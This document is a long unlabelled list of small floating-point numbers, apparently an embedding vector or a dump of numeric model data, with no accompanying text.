-0.006553194019943476, 0.0003615794121287763, -0.03629915788769722, 0.019951244816184044, 0.005969867575913668, 0.0221516415476799, -0.07360251992940903, -0.04332861304283142, 0.0362105518579483, -0.019079947844147682, -0.025474388152360916, -0.003047696780413389, 0.004692456219345331, -0.006375981029123068, -0.033138856291770935, -0.01934576779603958, -0.012463990598917007, -0.025430085137486458, 0.019862638786435127, -0.005881261080503464, 0.07123968005180359, 0.011806825175881386, 0.017824687063694, 0.01977403275668621, -0.028235958889126778, 0.00956212542951107, 0.0034168907441198826, -0.01798713393509388, 0.02003985270857811, -0.009347992949187756, -0.006161848548799753, -0.028974348679184914, 0.0202613677829504, 0.010492494329810143, -0.015727665275335312, 0.024927981197834015, 0.009111708961427212, -0.009104324504733086, 0.01851877197623253, 0.006656568497419357, -0.027940604835748672, -0.010160219855606556, 0.005323777906596661, 0.04905850440263748, -0.031957436352968216, -0.0036864024586975574, -0.02447018027305603, 0.02575497515499592, 0.007649700623005629, -0.016569428145885468, 0.007546326145529747, -0.009613812901079655, 0.032489076256752014, -0.023687489330768585, 0.010898607783019543, -0.0367421917617321, 0.021368950605392456, -0.0017222901806235313, -0.025238104164600372, 0.002263159491121769, 0.044273748993873596, -0.005128105171024799, -0.03278442844748497, -0.0205271877348423, -0.035354021936655045, 0.0007508483831770718, 0.026877325028181076, -0.001936422660946846, 0.0186369139701128, -0.009443983435630798, -0.025238104164600372, -0.0013134077889844775, -0.0070922174490988255, 0.02581404708325863, 0.012545213103294373, 0.0005482531269080937, -0.027408964931964874, -0.03160300850868225, 0.022712817415595055, 0.0011897278018295765, -0.0037602412048727274, 0.011363792233169079, -0.029077721759676933, -0.009443983435630798, -0.012301545590162277, -0.008705595508217812, 0.03585612401366234, -0.010928143747150898, 0.0218710545450449, -0.011238266713917255, -0.012766730040311813, -0.028235958889126778, -0.0015109266387298703, -0.00007885754166636616, 0.004976735450327396, 0.01123088225722313, 0.010588484816253185, 0.027157913893461227, 0.0008989874622784555, -0.007402340415865183, 0.003880229312926531, 0.00807796511799097, 0.00807796511799097, -0.017750849947333336, -0.012663355097174644, 0.005382848903536797, -0.0020545648876577616, 0.04380118101835251, -0.036328691989183426, -0.025415318086743355, -0.002687732456251979, 0.05759426951408386, -0.021265575662255287, -0.010544181801378727, -0.007121752947568893, 0.023022940382361412, -0.004692456219345331, -0.0183563269674778, 0.007036838214844465, -0.009791025891900063, -0.012980862520635128, 0.0016466054366901517, 0.015801504254341125, 0.02760094590485096, -0.0018450472271069884, -0.025090426206588745, 0.00243114260956645, -0.012338465079665184, -0.019301464781165123, -0.028073513880372047, 0.0017278280574828386, -0.038218967616558075, -0.031632546335458755, -0.002741265809163451, -0.016997693106532097, -0.014191818423569202, 0.04120205342769623, -0.0018312024185433984, -0.02576974406838417, -0.02955028973519802, -0.017898526042699814, -0.010403888300061226, 0.004817982204258442, 0.01723397709429264, 0.005611749365925789, 0.008705595508217812, -0.011001981794834137, 0.002624969696626067, -0.00912647694349289, 0.007143904455006123, 0.02015799470245838, -0.0024329887237399817, 0.006652876269072294, 0.01625930517911911, -0.0007979206275194883, 0.028501778841018677, 0.01918332278728485, 0.059868503361940384, -0.045514240860939026, 0.027305589988827705, 0.0024145289789885283, 0.00818134006112814, 0.0067414832301437855, 0.008498846553266048, -0.02284572646021843, 0.03175068646669388, -0.005032114684581757, 0.027025002986192703, -0.021811984479427338, 0.004290034528821707, -0.02117696963250637, 0.02246176451444626, -0.019271928817033768, 0.004998887423425913, -0.009259385988116264, 0.014597931876778603, 0.025961725041270256, -0.034822382032871246, -0.014442870393395424, -0.020025083795189857, -0.016008254140615463, -0.011105356737971306, -0.011201347224414349, -0.0032636753749102354, -0.007110677193850279, 0.029077721759676933, -0.0013632490299642086, 0.024617858231067657, -0.017366888001561165, -0.006003094837069511, 0.006390748545527458, -0.01107582077383995, -0.02452925220131874, 0.0202613677829504, -0.05972082540392876, -0.00166045012883842, 0.0061470805667340755, -0.007775226142257452, 0.02922539971768856, -0.02879713475704193, 0.002780031180009246, -0.030835086479783058, -0.011969270184636116, -0.023082010447978973, 0.007372804917395115, -0.02312631346285343, 0.011799441650509834, 0.014169666916131973, 0.048261042684316635, -0.015786737203598022, -0.02359888330101967, -0.013305752538144588, -0.0013475582236424088, -0.0095842769369483, 0.0023554579820483923, 0.013135924004018307, 0.000785921816714108, -0.00200656964443624, -0.012862720526754856, -0.0027394196949899197, 0.026434293016791344, 0.012914407067000866, -0.011223498731851578, -0.008964031003415585, 0.006076933816075325, 0.007598013151437044, 0.03609240800142288, -0.0404932014644146, 0.004050058778375387, 0.01307685300707817, -0.029520755633711815, 0.024263432249426842, -0.00008035738574108109, -0.01064017228782177, -0.001448163646273315, -0.011061053723096848, -0.008698211051523685, 0.011385943740606308, -0.05174623429775238, 0.019906941801309586, -0.0011195809347555041, -0.018459701910614967, 0.003346743993461132, 0.0334932841360569, -0.03257768228650093, 0.005416076630353928, -0.05384325981140137, 0.019360534846782684, 0.03136672452092171, -0.04580959677696228, 0.007598013151437044, 0.015978718176484108, -0.03824850171804428, 0.05472932383418083, -0.03355235233902931, -0.01825295388698578, -0.04386025294661522, 0.0313371904194355, -0.022240249440073967, -0.06509628891944885, -0.006283682305365801, 0.04515981301665306, -0.03801221773028374, -0.01609686017036438, 0.011164427734911442, -0.018976572901010513, 0.04022738337516785, -0.01711583510041237, -0.0041238972917199135, 0.014701306819915771, 0.0015173874562606215, 0.028649456799030304, 0.00019636507204268128, 0.003333822125568986, 0.017219210043549538, 0.008602220565080643, 0.028767598792910576, -0.029033418744802475, -0.0054714553989470005, 0.008919727988541126, 0.025134729221463203, 0.028989115729928017, -0.007959823124110699, 0.028280263766646385, -0.05972082540392876, 0.031041834503412247, 0.001790591049939394, -0.005349621642380953, 0.008683444000780582, 0.005072725936770439, 0.07389787584543228, 0.009458751417696476, -0.02603556402027607, 0.011105356737971306, 0.06397394090890884, -0.027911068871617317, -0.006003094837069511, -0.009325841441750526, -0.014117979444563389, -0.0016032251296564937, 0.022284552454948425, -0.04081809148192406, -0.03715568780899048, -0.04294465109705925, -0.013519885949790478, 0.01422873791307211, -0.021354183554649353, 0.03895735368132591, -0.010891224257647991, 0.030451124534010887, 0.04285604506731033, -0.03390678018331528, -0.013401743024587631, -0.031957436352968216, 0.01798713393509388, -0.011563156731426716, 0.0077383071184158325, 0.013512501493096352, 0.031898364424705505, -0.02101452462375164, -0.006800554227083921, 0.010765697807073593, 0.011282569728791714, 0.0017435188638046384, 0.027792926877737045, 0.023141082376241684, -0.014620083384215832, 0.00688546895980835, -0.0018035128014162183, -0.002802182687446475, 0.039400387555360794, 0.009658115915954113, -0.007989359088242054, -0.014944974333047867, 0.001818280667066574, -0.011356408707797527, 0.0028427941724658012, 0.011304721236228943, 0.018607379868626595, 0.01566859520971775, 0.008550534024834633, 0.01648082211613655, -0.008794201537966728, 0.0011472704354673624, -0.01869598589837551, -0.04625262692570686, 0.003466731868684292, -0.00640182476490736, -0.014597931876778603, 0.012574749067425728, -0.01825295388698578, -0.0056228251196444035, 0.002401607111096382, -0.001593072316609323, -0.021309880539774895, 0.01690908707678318, 0.018297256901860237, 0.014435486868023872, -0.0049176644533872604, -0.025917422026395798, 0.020733937621116638, -0.0029295545537024736, 0.01977403275668621, -0.0013521731598302722, 0.013313136994838715, 0.0313371904194355, 0.010558949783444405, -0.02743850089609623, 0.027851998805999756, 0.0020176453981548548, 0.03331606835126877, -0.03420213609933853, -0.013578956946730614, 0.036387763917446136, -0.015240329317748547, 0.013320520520210266, -0.019803568720817566, -0.01026359386742115, -0.014546245336532593, -0.06367858499288559, -0.006435052026063204, -0.03591519594192505, -0.011518853716552258, -0.002067486522719264, 0.015358472242951393, 0.016731873154640198, -0.022978637367486954, -0.007819529622793198, -0.01104628574103117, 0.033197928220033646, 0.006959307473152876, 0.03370003029704094, -0.0046776882372796535, 0.003767625195905566, -0.008868040516972542, -0.0095842769369483, -0.002196704503148794, -0.005578521639108658, -0.011282569728791714, 0.04386025294661522, -0.014797297306358814, -0.002198550384491682, -0.0005357928457669914, 0.004315878264605999, 0.005083801690489054, -0.012249858118593693, -0.023480741307139397, 0.04111344739794731, -0.025179032236337662, 0.018710752949118614, -0.025134729221463203, 0.047611262649297714, 0.0130990045145154, 0.02150185965001583, -0.006383365020155907, 0.001025436446070671, 0.005748351104557514, -0.016333144158124924, -0.0077383071184158325, 0.01474560983479023, 0.004075902048498392, 0.004954583942890167, 0.004319570027291775, 0.040640879422426224, 0.024750767275691032, 0.0024440644774585962, 0.027246519923210144, 0.014730841852724552, 0.0033098245039582253, -0.03169161453843117, -0.004810598213225603, 0.00599571131169796, 0.003749165451154113, 0.0047995224595069885, -0.011541005223989487, -0.012441839091479778, 0.015609524212777615, -0.0009654423920437694, 0.03160300850868225, 0.0066824122332036495, -0.002554822713136673, 0.013578956946730614, -0.011371176689863205, 0.006331677548587322, -0.018341559916734695, -0.00856530200690031, -0.010905992239713669, -0.046488914638757706, -0.023347830399870872, 0.012146484106779099, 0.004607541486620903, -0.006859625224024057, 0.01760317198932171, 0.010455574840307236, -0.019404837861657143, -0.023052476346492767, -0.0367126539349556, -0.000024733115424169227, 0.01134164072573185, -0.011777290143072605, 0.0052425554022192955, -0.019050411880016327, 0.027349894866347313, 0.02575497515499592, 0.003121535526588559, -0.011644380167126656, -0.026449060067534447, 0.04087716341018677, -0.010270978324115276, -0.02040904574096203, -0.01772131398320198, 0.014944974333047867, 0.010359584353864193, 0.006250455044209957, -0.037185221910476685, 0.0475226566195488, -0.0008233027183450758, 0.02615370601415634, 0.05443396791815758, -0.01658419519662857, 0.01368971448391676, 0.001885658479295671, 0.025430085137486458, 0.0054419199004769325, 0.0031916825100779533, 0.019847871735692024, 0.02928447164595127, -0.024676930159330368, 0.03008192963898182, -0.03358189016580582, 0.0016844477504491806, 0.023244457319378853, -0.0021302495151758194, -0.0278224628418684, 0.011238266713917255, -0.014944974333047867, -0.04341721907258034, 0.020054619759321213, -0.007516790647059679, -0.03051019459962845, -0.021974429488182068, 0.005929256323724985, 0.02046811766922474, 0.008166572079062462, -0.015269865281879902, 0.0041534327901899815, -0.0023296142462641, -0.003195374272763729, -0.03423167020082474, 0.00029235551482997835, -0.004928740207105875, 0.009997774846851826, 0.006822705734521151, 0.00018067432392854244, 0.0006783940480090678, 0.014693922363221645, -0.023894237354397774, -0.03213464841246605, 0.0014260119060054421, 0.00915601197630167, 0.025725441053509712, -0.012124331668019295, 0.02463262528181076, 0.04908803850412369, 0.007468795403838158, -0.0066196490079164505, 0.006320601794868708, -0.048379186540842056, -0.009170779958367348, -0.01825295388698578, 0.002294540870934725, -0.010677091777324677, -0.013674947433173656, 0.0036457909736782312, -0.031071370467543602, -0.013187610544264317, 0.0034464262425899506, -0.023185385391116142, 0.018282487988471985, -0.010056845843791962, 0.013948150910437107, -0.006431360263377428, -0.02046811766922474, 0.0042457315139472485, -0.02382039837539196, -0.0012967940419912338, -0.003946684300899506, -0.007550017908215523, 0.011171811260282993, 0.0038396180607378483, -0.0021228657569736242, 0.009850096888840199, -0.01620023511350155, -0.010138068348169327, -0.029668431729078293, -0.027940604835748672, 0.021634770557284355, 0.016274072229862213, 0.013815240934491158, 0.04796569049358368, -0.006316910032182932, -0.0345860980451107, 0.03553123399615288, -0.009141243994235992, -0.027527106925845146, -0.006161848548799753, -0.021900590509176254, 0.01312853954732418, -0.005405000876635313, -0.022284552454948425, -0.0009626734536141157, 0.021295111626386642, 0.0035276489797979593, -0.010972446762025356, 0.036653582006692886, -0.028014443814754486, -0.014686538837850094, 0.017736081033945084, -0.021752912551164627, 0.024558786302804947, -0.015085267834365368, -0.00013198686065152287, 0.01755886897444725, -0.0097245704382658, 0.0052130199037492275, 0.026020795106887817, -0.023938540369272232, -0.02695116400718689, -0.01402198988944292, -0.012936558574438095, 0.024160057306289673, 0.009015718474984169, 0.02802921086549759, -0.000258435815339908, 0.03541309013962746, 0.006948231719434261, -0.027792926877737045, -0.022860495373606682, 0.0383666455745697, 0.014487174339592457, -0.004541086498647928, -0.010071612894535065, 0.0008094579097814858, -0.0009220620850101113, 0.03101229853928089, 0.01631837710738182, -0.00022751581855118275, 0.0009036023984663188, -0.015624291263520718, -0.02532671019434929, 0.003058772534132004, -0.024824606254696846, 0.014893287792801857, -0.009554741904139519, -0.018179114907979965, 0.00730634992942214, 0.02235839143395424, 0.01993647776544094, 0.01215386763215065, -0.04542563483119011, -0.011888047680258751, -0.028265494853258133, 0.02489844523370266, -0.022535603493452072, 0.010920759290456772, 0.000444186560343951, 0.010883839800953865, -0.016761409118771553, -0.0021210196428000927, 0.0037011702079325914, 0.007671852130442858, 0.009207699447870255, 0.0007651546620763838, -0.022875262424349785, 0.022284552454948425, -0.016835248097777367, 0.010928143747150898, -0.01853354088962078, -0.025622066110372543, -0.028014443814754486, 0.027320358902215958, -0.017160138115286827, -0.007110677193850279, 0.011267801746726036, 0.019375303760170937, -0.006977767217904329, -0.039784349501132965, 0.013091620057821274, -0.03866199776530266, 0.019434373825788498, 0.018326791003346443, -0.0064978147856891155, 0.017101068049669266, -0.008410240523517132, 0.0013134077889844775, 0.0057446593418717384, 0.009510437957942486, -0.00765708414837718, 0.040168311446905136, -0.020719168707728386, -0.01788375899195671, -0.01922762580215931, 0.010433423332870007, 0.025917422026395798, 0.010610636323690414, -0.02003985270857811, 0.0032415236346423626, 0.013379591517150402, -0.007701387628912926, -0.031632546335458755, -0.014302576892077923, -0.014058908447623253, -0.026877325028181076, 0.0280882827937603, -0.018444934859871864, -0.004397100768983364, -0.015166491270065308, 0.0026471212040632963, 0.020984988659620285, -0.005633900873363018, 0.008314250037074089, 0.006172924302518368, 0.012279393151402473, -0.02705453895032406, -0.015328936278820038, 0.02766001783311367, -0.005312702152878046, -0.0004104976251255721, -0.0029517062939703465, -0.058421265333890915, 0.02630138210952282, -0.011289953254163265, -0.001899503287859261, 0.023037707433104515, 0.01436903141438961, 0.02284572646021843, -0.009680267423391342, 0.004349105525761843, -0.007195591926574707, 0.010152836330235004, 0.005117029417306185, 0.010455574840307236, -0.0224174614995718, 0.011415479704737663, -0.01104628574103117, 0.01620023511350155, -0.0523960180580616, -0.014494557864964008, -0.026537667959928513, -0.04504167288541794, -0.016111627221107483, -0.02410098724067211, 0.0008671444957144558, -0.004854901693761349, 0.01010114885866642, -0.0034298126120120287, -0.005430844146758318, 0.028856204822659492, -0.009355376474559307, 0.01933099888265133, -0.005493607372045517, 0.015225562267005444, -0.025562994182109833, -0.009628580883145332, 0.020290903747081757, -0.019360534846782684, 0.049117572605609894, 0.004079594276845455, -0.02128034457564354, 0.008609605021774769, -0.013335288502275944, -0.009547357447445393, 0.014546245336532593, -0.04876314848661423, -0.0009123707422986627, -0.011784673668444157, -0.010315281338989735, -0.024868909269571304, -0.0007125444826669991, 0.024071451276540756, -0.029254935681819916, 0.0035867199767380953, 0.0064498200081288815, 0.005696664098650217, -0.003420582739636302, 0.004795830696821213, -0.006996226962655783, 0.020320439711213112, -0.010603252798318863, -0.002102560130879283, 0.01939007081091404, -0.04093623533844948, 0.0070626819506287575, -0.04424421489238739, -0.03748057782649994, 0.010846920311450958, 0.0156538262963295, -0.015904879197478294, -0.05207112804055214, -0.010440806858241558, 0.03827803581953049, 0.041999515146017075, 0.018548307940363884, -0.04433282092213631, -0.02641952596604824, 0.0005551755311898887, -0.007114368956536055, -0.01794283092021942, 0.020763471722602844, -0.00967288389801979, -0.02554822713136673, 0.006243071053177118, 0.023702256381511688, 0.01315069105476141, -0.01939007081091404, 0.03523587808012962, 0.027187447994947433, -0.0021450172644108534, -0.0229491014033556, -0.0362105518579483, -0.030451124534010887, -0.025031356140971184, -0.026389990001916885, 0.03305025026202202, 0.0034870377276092768, 0.07691050320863724, 0.0007088525453582406, 0.014590548351407051, -0.005844341591000557, 0.025105195119976997, 0.018060972914099693, -0.01337220799177885, -0.028782367706298828, 0.015698131173849106, -0.016894318163394928, 0.01922762580215931, 0.0034390424843877554, -0.032548144459724426, -0.020807776600122452, 0.018326791003346443, 0.006996226962655783, -0.001731520052999258, -0.012958711013197899, -0.020512420684099197, -0.004267883021384478, -0.0415860153734684, -0.0027541874442249537, 0.0248541422188282, 0.010115916840732098, -0.003939300309866667, -0.00586280133575201, 0.04439188912510872, 0.006793170236051083, -0.014398567378520966, -0.016170699149370193, -0.03316839039325714, -0.016982926055788994, -0.019596818834543228, -0.01571289822459221, -0.03284350037574768, -0.02949121966958046, 0.019641121849417686, -0.006534734275192022, -0.01353465300053358, -0.013239298015832901, 0.006073242053389549, 0.0034999593626707792, 0.026168473064899445, -0.010854304768145084, -0.02312631346285343, 0.03514727205038071, -0.005235171411186457, -0.024425877258181572, -0.0038986890576779842, -0.01939007081091404, -0.032164182513952255, 0.010994598269462585, -0.026493363082408905, 0.015978718176484108, 0.0437421090900898, 0.007849065586924553, 0.050594352185726166, 0.0018302794778719544, -0.025681136175990105, -0.008646524511277676, -0.005966175813227892, 0.020807776600122452, -0.029476452618837357, 0.016392214223742485, -0.014708690345287323, -0.0059477160684764385, -0.02225501649081707, 0.0007323886384256184, 0.027305589988827705, 0.0057335831224918365, -0.011710834689438343, -0.01107582077383995, 0.026641041040420532, 0.014405950903892517, -0.044214677065610886, 0.036062873899936676, 0.0006700871745124459, 0.007317425683140755, -0.03721475973725319, -0.017632707953453064, -0.048585936427116394, -0.029786575585603714, -0.034763310104608536, 0.005859109107404947, -0.02997855469584465, -0.007284198421984911, -0.0007660776027478278, 0.010891224257647991, 0.022978637367486954, 0.009909167885780334, 0.021472325548529625, -0.009599044919013977, 0.01102413423359394, 0.01571289822459221, -0.01615593023598194, -0.01355680450797081, -0.022609442472457886, -0.020054619759321213, 0.024189593270421028, 0.01258213259279728, 0.036919403821229935, -0.016288841143250465, 0.009665499441325665, -0.014110595919191837, 0.015520917251706123, 0.009370144456624985, 0.037303365767002106, 0.0022594674956053495, 0.0008449928718619049, -0.0004790292587131262, 0.029949020594358444, 0.020054619759321213, -0.012892255559563637, 0.01131948921829462, 0.023702256381511688, 0.012648588046431541, -0.011784673668444157, 0.023052476346492767, -0.01884366385638714, -0.005537910386919975, 0.005951407831162214, 0.024455413222312927, 0.011186579242348671, -0.0410543754696846, -0.02534147910773754, -0.004725683480501175, 0.013734018430113792, 0.01851877197623253, 0.004142357036471367, -0.01028574537485838, -0.00615815632045269, -0.007723539136350155, -0.00444140424951911, 0.03526541590690613, -0.019257161766290665, -0.014435486868023872, -0.004744143225252628, -0.007269430439919233, -0.00888280849903822, 0.012781497091054916, -0.03121904842555523, -0.026065098121762276, -0.042531151324510574, 0.017544100061058998, -0.030451124534010887, -0.018548307940363884, -0.022594675421714783, 0.00782691314816475, 0.009946087375283241, -0.02204826846718788, 0.008498846553266048, -0.006966691464185715, 0.018917502835392952, -0.012493526563048363, -0.019478676840662956, 0.016982926055788994, -0.009931319393217564, 0.015491381287574768, 0.003739935578778386, -0.024676930159330368, -0.02262420952320099, 0.0012044955510646105, -0.028693759813904762, -0.017263513058423996, 0.022727584466338158, -0.04176322743296623, 0.007812145631760359, -0.01674664206802845, -0.017056765034794807, 0.011385943740606308, -0.0018755056662485003, -0.034320276230573654, -0.03030344657599926, 0.008277330547571182, -0.014302576892077923, -0.03056926652789116, -0.009370144456624985, 0.018563076853752136, 0.04241301119327545, 0.0221516415476799, -0.01869598589837551, -0.0072029754519462585, -0.003965144045650959, 0.004581697750836611, 0.0018496621632948518, 0.009008334018290043, -0.003950376063585281, 0.019035644829273224, 0.031071370467543602, 0.016377447172999382, 0.010972446762025356, -0.0047995224595069885, 0.01642175018787384, 0.01069185882806778, -0.00599571131169796, -0.020763471722602844, 0.002687732456251979, 0.012596900574862957, 0.010573716834187508, 0.01409582793712616, 0.01733735203742981, -0.03266628831624985, 0.006427668035030365, 0.010093765333294868, 0.012308929115533829, -0.029845645651221275, 0.012766730040311813, 0.0007522328523918986, -0.009281538426876068, -0.006154464557766914, 0.010042077861726284, 0.0008754513692110777, 0.0205271877348423, -0.015904879197478294, 0.03115997649729252, -0.008388088084757328, 0.004470939747989178, -0.023214921355247498, 0.011245650239288807, -0.000008040065040404443, -0.018976572901010513, -0.017101068049669266, 0.00649412302300334, -0.018223417922854424, 0.039193637669086456, -0.009776257909834385, -0.012124331668019295, -0.013431278988718987, -0.005896028596907854, -0.023480741307139397, 0.0213394146412611, 0.03452702611684799, -0.0095842769369483, 0.02463262528181076, 0.011363792233169079, -0.0015847653849050403, -0.0001615223882254213, -0.010522030293941498, -0.02306724339723587, 0.0013715558452531695, 0.008410240523517132, 0.012235090136528015, 0.01685001514852047, -0.026995467022061348, -0.018385862931609154, 0.009983006864786148, -0.0028077205643057823, 0.025799280032515526, 0.006667644251137972, 0.01450194139033556, 0.015026196837425232, -0.00525363115593791, 0.027645248919725418, 0.03550169989466667, -0.008417624048888683, 0.01853354088962078, -0.025917422026395798, -0.02198919653892517, 0.02074870467185974, 0.019670657813549042, 0.012220322154462337, 0.01652512513101101, -0.014036756940186024, 0.0367126539349556, -0.021044060587882996, 0.011378560215234756, -0.018769824877381325, 0.008129652589559555, -0.014243505895137787, -0.009887016378343105, 0.025179032236337662, 0.011799441650509834, 0.008816353976726532, 0.025297176092863083, 0.0029000190552324057, -0.010891224257647991, -0.007136520463973284, -0.0024606783408671618, 0.017898526042699814, -0.004928740207105875, 0.03355235233902931, 0.005740967113524675, -0.0329616442322731, 0.012131716124713421, 0.01620023511350155, 0.016879551112651825, 0.011297337710857391, -0.016347911208868027, -0.03237093240022659, -0.04087716341018677, 0.005419768393039703, -0.025090426206588745, -0.014014605432748795, -0.004330646246671677, -0.01061802078038454, 0.010366968810558319, -0.0006363982101902366, -0.03845525160431862, -0.026818254962563515, -0.019434373825788498, 0.011083205230534077, -0.004692456219345331, 0.000342196726705879, 0.014959742315113544, 0.00015494611579924822, 0.0069703832268714905, 0.038809675723314285, 0.02910725772380829, 0.02452925220131874, 0.009554741904139519, -0.0064682792872190475, -0.020379509776830673, 0.038809675723314285, -0.026286615058779716, 0.017425958067178726, 0.004766295198351145, 0.005637593101710081, -0.010403888300061226, -0.009008334018290043, 0.020084155723452568, 0.015978718176484108, 0.03700800985097885, -0.0012571057304739952, -0.0034242747351527214, 0.019360534846782684, -0.004020522814244032, 0.016451286152005196, 0.002881559543311596, -0.004603849723935127, -0.0011878818040713668, 0.02020229771733284, 0.032164182513952255, -0.011511470191180706, 0.007339577190577984, 0.006545810028910637, -0.03101229853928089, -0.009909167885780334, 0.007358036935329437, 0.006929771974682808, 0.04061134532094002, 0.003383663250133395, -0.0045041670091450214, 0.012249858118593693, 0.03863246366381645, -0.0014601624570786953, -0.06184738501906395, -0.014199202880263329, -0.02451448328793049, -0.0008283791248686612, 0.008284714072942734, 0.008956647478044033, 0.014664387330412865, 0.010411271825432777, 0.019035644829273224, -0.01409582793712616, -0.011083205230534077, 0.017322584986686707, -0.01204310916364193, -0.011629612185060978, 0.0367421917617321, -0.0013734018430113792, 0.010765697807073593, 0.027955371886491776, -0.031071370467543602, 0.011312104761600494, 0.013254065997898579, -0.030598802492022514, 0.017544100061058998, 0.005338545888662338, 0.0351177379488945, -0.025430085137486458, -0.022166410461068153, -0.0245735552161932, -0.016820481047034264, -0.011164427734911442, -0.015461846254765987, -0.014029373414814472, 0.00834378506988287, -0.004932432435452938, 0.006896544713526964, -0.023953309282660484, 0.020970221608877182, -0.0020397971384227276, -0.04111344739794731, -0.0065495022572577, 0.015373239293694496, -0.014553628861904144, -0.011710834689438343, -0.012774113565683365, 0.014391183853149414, 0.02246176451444626, 0.00987963192164898, -0.002305616857483983, 0.0006640877691097558, 0.02977180667221546, -0.013992453925311565, 0.007834297604858875, 0.023510275408625603, -0.023894237354397774, 0.03824850171804428, 0.013741401955485344, -0.008543149568140507, -0.018917502835392952, 0.010152836330235004, 0.03166208043694496, -0.025518691167235374, -0.011326872743666172, -0.0048585934564471245, -0.002466216217726469, 0.001884735538624227, 0.012131716124713421, -0.0005177946295589209, -0.008388088084757328, -0.002918478799983859, -0.00409067003056407, -0.003965144045650959, -0.002148709259927273, -0.031957436352968216, 0.014236122369766235, -0.015388007275760174, -0.024883678182959557, 0.0030661565251648426, -0.012796265073120594, -0.00031704537104815245, -0.006180308293551207, 0.018607379868626595, -0.007908136583864689, 0.018592610955238342, -0.010499878786504269, -0.006423976272344589, -0.005131796933710575, 0.015269865281879902, -0.011127508245408535, 0.037362437695264816, 0.014117979444563389, 0.007967207580804825, 0.013187610544264317, 0.007745690643787384, -0.008461927063763142, -0.015609524212777615, -0.00942183192819357, 0.0014610853977501392, -0.02420436032116413, 0.03272536024451256, 0.003180606523528695, 0.00730634992942214, -0.009864864870905876, -0.0028114125598222017, 0.006996226962655783, 0.021841518580913544, 0.025267640128731728, 0.010455574840307236, -0.023938540369272232, 0.014265657402575016, 0.002624969696626067, -0.029742270708084106, -0.019271928817033768, 0.011112740263342857, -0.016672803089022636, 0.02550392411649227, 0.007025762461125851, -0.018504004925489426, 0.01685001514852047, -0.005382848903536797, -0.039459459483623505, -0.008151804096996784, -0.0032212180085480213, -0.0036919403355568647, 0.017544100061058998, 0.006542118266224861, -0.0012183403596282005, 0.0006880853907205164, 0.021575698629021645, -0.01282580103725195, -0.025430085137486458, 0.030805550515651703, 0.015594756230711937, -0.0020582566503435373, 0.0186369139701128, 0.009643347933888435, 0.038602929562330246, 0.019788799807429314, -0.017027229070663452, 0.012080028653144836, -0.01185851264744997, 0.003093845909461379, 0.017485029995441437, 0.009680267423391342, 0.019198089838027954, -0.02128034457564354, -0.006368597038090229, -0.02150185965001583, 0.015388007275760174, 0.004795830696821213, -0.006246763281524181, 0.010012541897594929, -0.004766295198351145, -0.01315069105476141, 0.019596818834543228, 0.004515243228524923, -0.04111344739794731, -0.05387279391288757, -0.00042688060784712434, -0.003245215630158782, 0.01755886897444725, 0.00011964193981839344, 0.004515243228524923, -0.026537667959928513, 0.01652512513101101, 0.0280882827937603, 0.036269623786211014, -0.002743111690506339, 0.007022070698440075, -0.006217227317392826, -0.00010337433195672929, 0.020733937621116638, 0.002396069234237075, -0.017824687063694, -0.021147433668375015, 0.044214677065610886, -0.015786737203598022, -0.007195591926574707, 0.012220322154462337, -0.011260418221354485, 0.012124331668019295, 0.006254146806895733, 0.0014693922130391002, -0.007627548649907112, -0.018120042979717255, -0.02262420952320099, -0.009709803387522697, 0.0038174663204699755, 0.005803730338811874, 0.016761409118771553, 0.0051797921769320965, -0.009702418930828571, 0.01631837710738182, -0.012294161133468151, -0.009215082973241806, 0.012227706611156464, 0.018769824877381325, -0.0023886854760348797, 0.017691778019070625, 0.03612194582819939, -0.018947036936879158, -0.0011777289910241961, -0.008329017087817192, -0.007760458625853062, -0.012973478063941002, 0.0012460298603400588, 0.00035488777211867273, 0.004171892534941435, -0.008631756529211998, 0.017411191016435623, 0.0229638684540987, -0.005788962356746197, -0.019419606775045395, 0.02311154641211033, 0.013158075511455536, -0.0005302549107000232, 0.01034481730312109, -0.0009372913627885282, -0.038425713777542114, 0.0020268752705305815, -0.002859407803043723, -0.0036347152199596167, -0.02156093157827854, -0.02257990650832653, -0.0000024697062599443598, 0.006608573254197836, -0.0033947392366826534, 0.029889948666095734, 0.005286858417093754, 0.011828976683318615, 0.006966691464185715, 0.015506149269640446, -0.03160300850868225, 0.0030550805386155844, 0.03517680615186691, 0.01760317198932171, -0.013172843493521214, 0.018681218847632408, 0.006180308293551207, 0.002948014298453927, 0.00012714118929579854, -0.013578956946730614, 0.045071206986904144, 0.0031639928929507732, 0.018223417922854424, -0.002815104555338621, 0.021738145500421524, -0.019050411880016327, -0.007524174638092518, -0.006516274530440569, 0.006601189263164997, 0.0028409480582922697, 0.003202758263796568, 0.015461846254765987, -0.0027338818181306124, 0.024484949186444283, -0.018489237874746323, -0.010012541897594929, 0.03213464841246605, -0.0172782801091671, -0.01515172328799963, -0.006700871512293816, 0.007959823124110699, 0.01518125832080841, 0.0020730243995785713, 0.033079784363508224, 0.01761793904006481, 0.0207930076867342, 0.01825295388698578, -0.010654940269887447, -0.004928740207105875, 0.0066196490079164505, -0.008838505484163761, -0.005393924657255411, 0.013822624459862709, 0.003913456574082375, -0.010152836330235004, 0.009946087375283241, -0.012272009626030922, -0.01593441516160965, -0.015417543239891529, -0.007040530443191528, -0.008070581592619419, -0.002713576192036271, 0.031898364424705505, 0.011090588755905628, 0.008262562565505505, 0.019670657813549042, 0.0065495022572577, -0.012899640016257763, 0.0095842769369483, -0.017868991941213608, -0.005796346347779036, -0.004784754477441311, 0.020866846665740013, -0.017691778019070625, 0.02015799470245838, -0.003682710463181138, -0.0011186578776687384, 0.012360616587102413, 0.00872036349028349, -0.010861688293516636, -0.009576893411576748, -0.016820481047034264, 0.024617858231067657, -0.01885843090713024, 0.01217601913958788, -0.011053669266402721, 0.011223498731851578, 0.004877053201198578, -0.01707153208553791, -0.013475582003593445, 0.001470315270125866, 0.008114884607493877, -0.0017998209223151207, -0.00043426448246464133, 0.0013669409090653062, -0.02231408655643463, -0.00815918855369091, 0.011666531674563885, 0.019862638786435127, 0.011437631212174892, 0.015624291263520718, 0.01320976298302412, -0.01652512513101101, 0.004382333252578974, -0.009813177399337292, 0.011555773206055164, 0.01733735203742981, 0.020290903747081757, -0.0007679236005060375, 0.020822543650865555, 0.02280142344534397, -0.0016179928788915277, 0.007502022664994001, -0.00023524582502432168, 0.016288841143250465, -0.022166410461068153, 0.024987053126096725, -0.012220322154462337, -0.008624373003840446, 0.006889160722494125, 0.005379157140851021, -0.009503054432570934, 0.013165459036827087, 0.000640551676042378, -0.003378125373274088, 0.034763310104608536, 0.00021897820988669991, -0.002540054963901639, -0.010898607783019543, -0.0008214567205868661, 